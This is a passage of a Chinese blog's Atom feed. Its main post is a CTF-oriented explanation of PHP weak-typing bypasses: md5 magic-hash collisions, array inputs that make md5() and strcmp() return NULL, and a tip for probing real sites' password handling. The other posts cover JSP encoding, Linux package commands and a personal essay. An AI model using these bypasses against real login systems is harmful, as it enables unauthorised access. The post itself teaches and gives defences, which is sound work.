<link href="https://cr4ckm3.top/2017/05/08/%E6%B5%85%E8%B0%88php%E5%BC%B1%E7%B1%BB%E5%9E%8B%E5%AE%89%E5%85%A8%E4%B9%8BCTF/"/>
<id>https://cr4ckm3.top/2017/05/08/%E6%B5%85%E8%B0%88php%E5%BC%B1%E7%B1%BB%E5%9E%8B%E5%AE%89%E5%85%A8%E4%B9%8BCTF/</id>
<published>2017-05-08T02:47:54.000Z</published>
<updated>2019-08-30T10:00:39.803Z</updated>
<content type="html"><![CDATA[<h1 id="弱类型语言-PHP"><a href="#弱类型语言-PHP" class="headerlink" title="弱类型语言:PHP"></a>弱类型语言:PHP</h1><p>PHP是一种非常弱的类型语言,在大多数编程语言中,变量只能保存一种类型的数据,而且这个类型必须在使用变量之前声明,例如C语言。而在PHP中,变量的类型是由赋给变量的指确定。所有PHP也是一种动态类型语言。</p><p>因此在PHP中,可进行如下赋值:<br> $a = 123;<br> $a = “abc”;<br> $a = arry();</p><h2 id="比较操作符"><a href="#比较操作符" class="headerlink" title="比较操作符"></a>比较操作符</h2><h3 id="等于操作符"><a href="#等于操作符" class="headerlink" title="等于操作符"></a>等于操作符</h3><p><code>$a == $b</code></p><p>在这中情况下存在类型转换的问题,比如<br> 123 == ‘123’ //ture<br> 1 == ‘1abc’ //ture<br> 0 == ‘abc’ //ture<br> intval(‘3389a’) //输出3389<br> “0e132456789” == “0e7124511451155” //ture<br> “0e132456789” == “0e1” //ture<br><code>0 == 'abc'</code>为<code>true</code>是因为int型和字符串型比较,字符串型会初始化为整型。’abc’会被初始化为0。</p><p>后面两种<code>0e\d+</code>这种情况的比较,php就会将这种字符串解析为科学计数法,并且判断为相等。<br>如果不满足<code>0e\d+</code>这种模式就不会相等。<br>在CTF中就会考察到该类型。附上做过的一道题:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'user'</span>]) <span class="keyword">and</span> <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'password'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (!ctype_alpha(<span class="variable">$_GET</span>[<span class="string">'user'</span>])){<span class="keyword">echo</span> <span class="string">'Wrong.'</span>;}</span><br><span class="line"> <span class="keyword">if</span> (!is_numeric(<span class="variable">$_GET</span>[<span class="string">'password'</span>])){<span class="keyword">echo</span> <span class="string">'Wrong.'</span>;}</span><br><span class="line"> <span class="keyword">if</span> (md5(<span class="variable">$_GET</span>[<span class="string">'user'</span>]) == md5(<span class="variable">$_GET</span>[<span class="string">'password'</span>])) {</span><br><span class="line"> <span class="keyword">echo</span> (<span class="string">'Flag: '</span>.<span class="variable">$flag</span>);</span><br><span class="line"> }<span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'Wrong.'</span>;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>从上面的代码可看出,要想获取flag的话。<code>user</code>要设置为非字符,<code>password</code>要设置为非数字。并且md5()返回的值相同。所以可利用上面说的<code>0e\d+</code>这种模式便可绕过。<br> 240610708 md5(‘240610708’); // 0e462097431906509019562988736854<br> QNKCDZO md5(‘QNKCDZO’); // 0e830400451993494058024219903391<br>类似的还有:<br> md5(‘aabg7XSs’) == md5(‘aabC9RqS’));<br> sha1(‘aaroZmOk’) == sha1(‘aaK1STfY’));<br> sha1(‘aaO8zKZF’) == sha1(‘aa3OFF9m’));<br>防御:<br>对上面出现的弱类型可用<code>$a === $b</code>进行防御。</p><h3 id="恒等操作符"><a href="#恒等操作符" class="headerlink" title="恒等操作符:"></a>恒等操作符:</h3><p><code>$a === $b</code></p><p>但恒等于也存在可被绕过的问题,下面一题也是CTF中常涉及的一道题。<br>此题涉及到md5()函数的参数类型。</p><p><code>string md5 ( string $str [, bool $raw_output = false ] )</code></p><p>md5()函数需求接收的是String类型的参数,但当我们传入的是arry时,md5()只会警告<code>Warning: md5() expects parameter 1 to be string, array given</code>并无法计算出arry的md5值,这样我们传入两个arry参数时,会返回两个NULL值,也就是造成NULL=NULL,从而可成功绕过<code>$a === $b</code>这样的判断。</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'a'</span>]) <span class="keyword">and</span> <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'b'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$_GET</span>[<span class="string">'a'</span>] != <span class="variable">$_GET</span>[<span class="string">'b'</span>]) {</span><br><span class="line"> <span class="keyword">if</span> (md5(<span class="variable">$_GET</span>[<span class="string">'a'</span>]) === md5(<span class="variable">$_GET</span>[<span class="string">'b'</span>])) {</span><br><span class="line"> <span class="keyword">echo</span> (<span class="string">'Flag: '</span>.<span class="variable">$flag</span>);</span><br><span class="line"> }<span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'Wrong.'</span>;</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'Wrong.'</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>防御:<br>对于此类的防御是,在获取从变量前先判断获取的变量是否是数组便可。</p><h2 id="比较函数"><a href="#比较函数" class="headerlink" title="比较函数"></a>比较函数</h2><h3 id="strcmp"><a href="#strcmp" class="headerlink" title="strcmp()"></a>strcmp()</h3><p><code>int strcmp ( string $str1 , string $str2 )</code><br>strcmp()函数对传入的两个字符串参数进行比较。该函数返回:</p><pre><code> 0 - 如果两个字符串相等<0 - 如果 string1 小于 string2>0 - 如果 string1 大于 string2</code></pre><p>strcmp()函数本质上是将两个参数转换为ascii然后在做数学的减法,再返回一个int的值。</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'password'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (strcmp(<span class="variable">$_GET</span>[<span class="string">'password'</span>], <span class="variable">$flag</span>) == <span class="number">0</span>)</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'Flag: '</span>.<span class="variable">$flag</span>);</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="keyword">print</span> <span class="string">'Invalid password'</span>;</span><br><span class="line"> } </span><br></pre></td></tr></table></figure><p>上面的代码看来,只要判断<code>password</code>与<code>$flag</code>相等,便可返回Flag。<br>这里可传入<code>password[]=x</code>便可使这个函数出错返回NULL。此时NULL==0,是bool(true)。这样便可成功绕过。</p><h1 id="另注"><a href="#另注" class="headerlink" title="另注"></a>另注</h1><pre><code>先注册密码为240610708的用户A。然后用密码QNKCDZO尝试登录用户A。倘若成功登录,则证明此网站采用了不完备的加密体制md5一次加密。先注册密码为0E33455555的用户A。然后用密码0E234230570345尝试登录用户A。倘若成功登录,则证明此网站采用了明文进行存储密码!</code></pre>]]></content>
<summary type="html"><h1 id="弱类型语言-PHP"><a href="#弱类型语言-PHP" class="headerlink" title="弱类型语言:PHP"></a>弱类型语言:PHP</h1><p>PHP是一种非常弱的类型语言,在大多数编程语言中,变量只能保存一种类型的数据,而且这</summary>
<category term="CTF" scheme="https://cr4ckm3.top/tags/CTF/"/>
<category term="PHP弱类型" scheme="https://cr4ckm3.top/tags/PHP%E5%BC%B1%E7%B1%BB%E5%9E%8B/"/>
</entry>
<entry>
<title>关于字符编码</title>
<link href="https://cr4ckm3.top/2017/04/07/%E7%BC%96%E7%A0%81%E9%97%AE%E9%A2%98/"/>
<id>https://cr4ckm3.top/2017/04/07/%E7%BC%96%E7%A0%81%E9%97%AE%E9%A2%98/</id>
<published>2017-04-07T12:50:00.000Z</published>
<updated>2019-08-30T10:00:44.183Z</updated>
<content type="html"><![CDATA[<p>在学习Jsp的过程中在编写的文件含有中文的情况下即使ContenType里的charset=gb2312的时候,客户端显示的页面会有乱码情况。<br>于是便开始查询了相关资料。</p><span id="more"></span><div style="text-align: center">其中困扰的问题是:1,windows的自带记事本下的ANSI编码是什么?2,设置了charset=gbk/gb2312为什么还会回乱码?3,pageEncoding和charset的区别?4,如果charset=utf-8又会怎么样?</div><hr><p style="text-align:center;">先了解一些基本知识。</p><h1 id="关于Jsp"><a href="#关于Jsp" class="headerlink" title="关于Jsp"></a>关于Jsp</h1><p>在JSP标准的语法中,如果pageEncoding属性存在,那么JSP页面的字符编码方式就由pageEncoding决定,否则就由contentType属性中的 charset决定,如果charset也不存在,JSP页面的字符编码方式就采用默认的ISO-8859-1。</p><h2 id="pageEncoding"><a href="#pageEncoding" class="headerlink" title="pageEncoding"></a>pageEncoding</h2><p>pageEncoding的内容只是用于jsp输出时的编码,不会作为header发出去的。</p><p>pageEncoding 是通知web server jsp的编码。<%@pagepageEncoding=”UTF-8” %>作用:<br>告诉JSP编译器在将JSP文件编译成Servlet时使用的编码。通常,在JSP内部定义的字符串(直接在JSP中定义,而不是从浏览器提交的数据)出现乱码时,很多都是由于该参数设置错误引起的。</p><p>pageEncoding是jsp文件本身的编码。</p><h2 id="ContentType"><a href="#ContentType" class="headerlink" title="ContentType"></a>ContentType</h2><p>ContentType属性指定响应的 HTTP内容类型。如果未指定 ContentType,默认为Text/Html。</p><p>ContentType属性指定了MIME类型和JSP页面回应时的字符编码方式。MIME类型的默认值是“text/html”; 字符编码方式的默认值是“ISO-8859-1”. MIME类型和字符编码方式由分号隔开。</p><p>contentType的charset是指服务器发送给客户端时的内容编码,contentType里的charset=utf-8是指示页面的输出方式为utf-8。</p><h2 id="编码阶段"><a href="#编码阶段" class="headerlink" title="编码阶段"></a>编码阶段</h2><p>JSP编码要经过三个阶段,第一阶段会用pageEncoding,第二阶段会用utf-8至utf-8,第三阶段就是由Tomcat出来的网页,用的是contentType。</p><p>第一阶段是jsp编译成.Java,它会根据pageEncoding的设定读取jsp,结果是由指定的编码方案翻译成统一的UTF-8 JAVA源码(即.java),如果pageEncoding设定错了,或没有设定,出来的就是中文乱码。 </p><p>第二阶段是由JAVAC的JAVA源码至Java byteCode的编译,不论JSP编写时候用的是什么编码方案,经过这个阶段的结果全部是UTF-8的encoding的java源码。 </p><p>JAVAC用UTF-8的encoding读取java源码,编译成UTF-8 encoding的二进制码(即.class),这是JVM对常数字串在二进制码(java encoding)内表达的规范。 </p><p>第三阶段是Tomcat(或其的application Container)载入和执行阶段二的来的JAVA二进制码,输出的结果,也就是在客户端见到的,这时隐藏在阶段一和阶段二的参数contentType就发挥了功效。</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>下面总结下,如何防止中文乱码。<br>1、对于同一个应用,最好统一编码,推荐为UTF-8,当然GBK也可以。<br>2、正确设置JSP的pageEncoding参数<br>3、在所有的JSP/Servlet中设置contentType=”text/html;charset=UTF-8”或response.setCharacterEncoding(“UTF-8”),从而间接实现对浏览器编码的设置。</p><h1 id="补充一点"><a href="#补充一点" class="headerlink" title="补充一点"></a>补充一点</h1><p>1.<%@ page contentType=”text/html; charset=utf-8”%><br>2.<%@ page pageEncoding=”utf-8”%><br>3.<.meta http-equiv=”Content-Type” content=”text/html; charset=utf-8”><br>4.<% request.setCharacterEncoding(“utf-8”); %></p><p>1和2都是jsp本身的编码设置,contenttype是服务器发给客户端的内容编码设置,pageencoding是当前jsp页面的本身的编码</p><p>3是HTML网页的编码方式,如果不是jsp页面,普通的HTML里要设置这个才能让中文不乱码<br><a href="http://www.w3school.com.cn/tags/tag_meta.asp">Html.meta标签</a></p><p>4是HttpRequest对象本身的编码,是客户端请求时的编码格式。</p><hr><h1 id="关于字符编码"><a href="#关于字符编码" class="headerlink" title="关于字符编码"></a>关于字符编码</h1><h2 id="ANSI"><a href="#ANSI" class="headerlink" title="ANSI"></a>ANSI</h2><p>Windows 里说的「ANSI」其实是 Windows code pages,这个模式根据当前locale选定具体的编码,比如简体中文locale下是GBK</p><p>使用1至4个字节来代表一个字符的各种汉字延伸编码方式,称为 ANSI 编码。在简体中文Windows操作系统中,ANSI 编码代表 GBK 编码;在日文Windows操作系统中,ANSI编码代表Shift_JIS编码。不同ANSI编码之间互不兼容,当信息在国际间交流时,无法将属于两种语言的文字,存储在同一段 ANSI 编码的文本中。当然对于ANSI编码而言,0x00~0x7F之间的字符,依旧是1个字节代表1个字符。这一点是ANSI编码与Unicode编码之间最大也最明显的区别。</p><h2 id="UTF-8"><a href="#UTF-8" class="headerlink" title="UTF-8"></a>UTF-8</h2><p>区分 带BOM的UTF-8 与 无带BOM的UTF-8<br>带BOM的是微软自作聪明的毛病,一般使用不带BOM的UTF-8。</p><p>UTF-8中的字符可以是 1-4 个字节长。UTF-8可以表示Unicode标准中的任意字符。UTF-8向后兼容 ASCII。UTF-8 是网页和电子邮件的首选编码。UTF-8是Unicode的实现方式之一。</p><p>Unicode是一个字符集(character set),utf-8是一种编码(encoding)。</p><h1 id="参考资料:"><a href="#参考资料:" class="headerlink" title="参考资料:"></a>参考资料:</h1><p>百度百科<br><a href="http://blog.csdn.net/kerrywang/article/details/4454895">木头的天空的博客</a><br><a href="https://www.zhihu.com/question/20650946">知乎</a><br><a href="http://www.ruanyifeng.com/blog/2007/10/ascii_unicode_and_utf-8">阮一峰的博客</a><br><a href="http://www.cnblogs.com/muanblog/p/4604809.html">JSP编码问题详解</a></p>]]></content>
<summary type="html"><p>在学习Jsp的过程中在编写的文件含有中文的情况下即使ContenType里的charset=gb2312的时候,客户端显示的页面会有乱码情况。<br>于是便开始查询了相关资料。</p></summary>
<category term="Unicode" scheme="https://cr4ckm3.top/tags/Unicode/"/>
<category term="编码" scheme="https://cr4ckm3.top/tags/%E7%BC%96%E7%A0%81/"/>
<category term="Jsp" scheme="https://cr4ckm3.top/tags/Jsp/"/>
</entry>
<entry>
<title>杂谈</title>
<link href="https://cr4ckm3.top/2017/04/06/%E6%9D%82%E8%B0%88/"/>
<id>https://cr4ckm3.top/2017/04/06/%E6%9D%82%E8%B0%88/</id>
<published>2017-04-06T13:14:54.000Z</published>
<updated>2019-08-30T10:00:40.603Z</updated>
<content type="html"><![CDATA[<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=280 height=52 src="//music.163.com/outchain/player?type=0&id=2213825453&auto=1&height=32"></iframe><span id="more"></span><p style="text-align: center;">看到倒计时距离大三结束也就只有100天,停下手上的工作,脑海中不禁的想了想在大学的这三年,这三年里我究竟学了些什么,学会了些什么,而又能做些什么。</p><h2 id="反思过去的三年"><a href="#反思过去的三年" class="headerlink" title="反思过去的三年"></a>反思过去的三年</h2><p>在这三年里,我虽然有在学课本上的知识,也在自学课外的知识。但都是学到一半,然后又看到一些其他新知识。然后就会放下当前的学习进度去学另一门知识。反反复复,也就什么都懂一点,然而什么都不会,也不精。C/JAVA/JSP/PHP/Python都有所了解,可都不精。这种20出头年龄对社会上的好奇心也重,看到什么都想学。所以导致现在无一技之长,等于什么都不会。况且在这毕业季看到各种师兄、师姐的诉苦,自己更是心烦意燥。在这过去的三年里也更是混日子混得多,只是完成老师布置的作业,此外也很少自己深入学习课本知识。这是个坏习惯,好在及时更改。如今遇到问题,第一时间不会是向人家求解,而是自己独自解决问题,通过各种搜索引擎,查阅资料等办法去解决问题。这是收获最大的一点。懂得如何获取课本上没有的知识。<br>另外一点,也是最近觉得很重要的一点。此博客已经建立的有半年左右,却很少更新。在原本的思维里觉得更新博客会很费时间,但其实并不如此。在写下东西的同时,大脑会把知识整理一遍,然后再写下来记录在博客上。第一方便以后查阅、第二是方便记下一些平时在学习上、看书时的一些心得又或者是些易于忘记的知识点。所以以后会多些记录下自己的心得。三年过去了,欠下的终究要还。</p><h2 id="接下来的日子里"><a href="#接下来的日子里" class="headerlink" title="接下来的日子里"></a>接下来的日子里</h2><p style="text-align: center;">猪猪侠分享了他的“白帽学习路线”,看过之后有一句话是值得我们学习的:学会如何学习,培养学习习惯,锻造学习力。 为了能到远方,脚下的每一步都不能少。<p style="text-align: center;">在此为自己定了个小目标,一直努力下去。<hr><h2 id="给自己的忠告"><a href="#给自己的忠告" class="headerlink" title="给自己的忠告"></a>给自己的忠告</h2><div style="text-align: center">1.坚持,不要三天打鱼两天晒网;2.静心,不要心烦气躁整天抱怨;3.学习,关注安全技术扎实基础;4.视野,学会变通切勿钻牛角尖;5.信念,坚持对的事情不要堕落。</div><h1 id="Just-do-it"><a href="#Just-do-it" class="headerlink" title="Just do it!!"></a>Just do it!!</h1>]]></content>
<summary type="html"><iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=280 height=52 src="//music.163.com/outchain/player?type=0&id=2213825453&auto=1&height=32"></iframe></summary>
<category term="杂记" scheme="https://cr4ckm3.top/tags/%E6%9D%82%E8%AE%B0/"/>
<category term="心得" scheme="https://cr4ckm3.top/tags/%E5%BF%83%E5%BE%97/"/>
</entry>
<entry>
<title>Linux</title>
<link href="https://cr4ckm3.top/2016/08/28/Linux/"/>
<id>https://cr4ckm3.top/2016/08/28/Linux/</id>
<published>2016-08-28T02:47:54.000Z</published>
<updated>2019-08-30T10:00:41.583Z</updated>
<content type="html"><![CDATA[<h1 id="一般来说著名的linux系统基本上分两大类:"><a href="#一般来说著名的linux系统基本上分两大类:" class="headerlink" title="一般来说著名的linux系统基本上分两大类:"></a>一般来说著名的linux系统基本上分两大类:</h1><p>1.RedHat系列:Redhat、Centos、Fedora等<br>2.Debian系列:Debian、Ubuntu等 </p><h2 id="RedHat-系列"><a href="#RedHat-系列" class="headerlink" title="RedHat 系列"></a>RedHat 系列</h2><p>1 常见的安装包格式 rpm包,安装rpm包的命令是“rpm -参数”<br>2 包管理工具 yum<br>3 支持tar包 </p><h2 id="Debian系列"><a href="#Debian系列" class="headerlink" title="Debian系列"></a>Debian系列</h2><p>1 常见的安装包格式 deb包,安装deb包的命令是“dpkg -参数”<br>2 包管理工具 apt-get<br>3 支持tar包 </p><h3 id="一、yum安装。"><a href="#一、yum安装。" class="headerlink" title="一、yum安装。"></a>一、yum安装。</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">yum安装常用软件的命令</span><br><span class="line"><span class="meta">#</span><span class="bash">yum check-update</span></span><br><span class="line"><span class="meta">#</span><span class="bash">yum remove 软件包名</span></span><br><span class="line"><span class="meta">#</span><span class="bash">yum install 软件包名</span></span><br><span class="line"><span class="meta">#</span><span class="bash">yum update 软件包名</span></span><br><span class="line">yum命令常见使用方法</span><br><span class="line">yum -y install 包名(支持*) :自动选择y,全自动</span><br><span class="line">yum install 包名(支持*) :手动选择y or n</span><br><span class="line">yum remove 包名(不支持*)</span><br><span class="line">rpm -ivh 包名(支持*):安装rpm包</span><br><span class="line">rpm -e 包名(不支持*):卸载rpm包</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="二、apt-get安装。"><a href="#二、apt-get安装。" class="headerlink" title="二、apt-get安装。"></a>二、apt-get安装。</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">apt-cache search package 搜索软件包</span><br><span class="line">apt-cache show package 获取包的相关信息,如说明、大小、版本等</span><br><span class="line">sudo apt-get install package 安装包</span><br><span class="line">sudo apt-get install package --reinstall 重新安装包</span><br><span class="line">sudo apt-get -f install 修复安装</span><br><span class="line">sudo apt-get remove package 删除包</span><br><span class="line">sudo apt-get remove package --purge 删除包,包括配置文件等</span><br><span class="line">sudo apt-get update 更新源</span><br><span class="line">sudo apt-get upgrade 更新已安装的包</span><br><span class="line">sudo apt-get dist-upgrade 升级系统</span><br><span class="line">apt-cache depends package 了解使用该包依赖那些包</span><br><span class="line">apt-cache rdepends package 查看该包被哪些包依赖</span><br><span class="line">sudo apt-get build-dep package 安装相关的编译环境</span><br><span class="line">apt-get source package 下载该包的源代码</span><br><span class="line">sudo apt-get clean && sudo apt-get autoclean 清理无用的包</span><br><span class="line">sudo apt-get check 检查是否有损坏的依赖</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><h1 id="一般来说著名的linux系统基本上分两大类:"><a href="#一般来说著名的linux系统基本上分两大类:" class="headerlink" title="一般来说著名的linux系统基本上分两大类:"></a>一般来说著名的linux系统基本上分两大</summary>
<category term="Linux" scheme="https://cr4ckm3.top/tags/Linux/"/>
<category term="笔记" scheme="https://cr4ckm3.top/tags/%E7%AC%94%E8%AE%B0/"/>
</entry>
<entry>
<title>Markdown</title>
<link href="https://cr4ckm3.top/2016/08/28/Markdown/"/>
<id>https://cr4ckm3.top/2016/08/28/Markdown/</id>
<published>2016-08-28T02:47:54.000Z</published>
<updated>2019-08-30T10:00:39.803Z</updated>
<content type="html"><</code></p>]]></content>
<summary type="html"><h1 id="test"><a href="#test" class="headerlink" title="test"></a>test</h1><p><code># test</code> 一级标题</p>
<p><code>&lt;!--more--&gt;</code></summary>
<category term="Markdown" scheme="https://cr4ckm3.top/tags/Markdown/"/>
<category term="test" scheme="https://cr4ckm3.top/tags/test/"/>
</entry>
</feed>